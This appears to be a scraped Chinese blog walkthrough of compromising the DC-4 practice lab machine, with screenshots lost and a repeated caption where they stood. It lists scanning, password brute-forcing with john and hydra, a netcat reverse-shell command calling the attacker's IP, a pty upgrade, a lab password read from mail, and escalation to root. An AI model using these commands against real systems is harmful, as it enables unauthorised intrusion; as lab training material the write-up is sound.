1.主机扫描

入侵靶机DC-4

2.端口扫描

入侵靶机DC-4

3.测试访问web服务器页面

入侵靶机DC-4

4.尝试**web登录界面

cd /usr/share/john/

cp password.ist ~/Desktop

入侵靶机DC-4

入侵靶机DC-4

入侵靶机DC-4

5.抓取命令包

入侵靶机DC-4

7.执行命令反弹shell

nc+10.3.139.75+666+-e+/bin/bashls

sudo nc -lvvp 666

python -c ‘import pty;pty.spawn("/bin/sh")’
 

入侵靶机DC-4

入侵靶机DC-4

8.查看用户

入侵靶机DC-4

入侵靶机DC-4

9.根据提示密码本**家目录下的所有用户

hydra -L user.txt -P pass.txt ssh://10.3.139.72

入侵靶机DC-4

入侵靶机DC-4

10.SSH登录jim用户

入侵靶机DC-4

入侵靶机DC-4

cd /var/mail/

入侵靶机DC-4

11.根据邮件上的密码登录charles用户

ssh [email protected]
Password is:  ^xHhA&hvim0y

入侵靶机DC-4

12.切到wxk用户  获得root权限

入侵靶机DC-4

13.切到root目录下,查看flag 

入侵靶机DC-4

相关文章:

  • 2021-12-21
  • 2021-08-06
  • 2021-07-04
  • 2022-02-09
  • 2021-09-08
  • 2021-05-23
  • 2021-12-26
  • 2021-05-20
猜你喜欢
  • 2021-05-24
  • 2022-01-11
  • 2021-08-16
  • 2021-04-05
  • 2021-12-22
  • 2021-04-23
  • 2021-05-31
相关资源
相似解决方案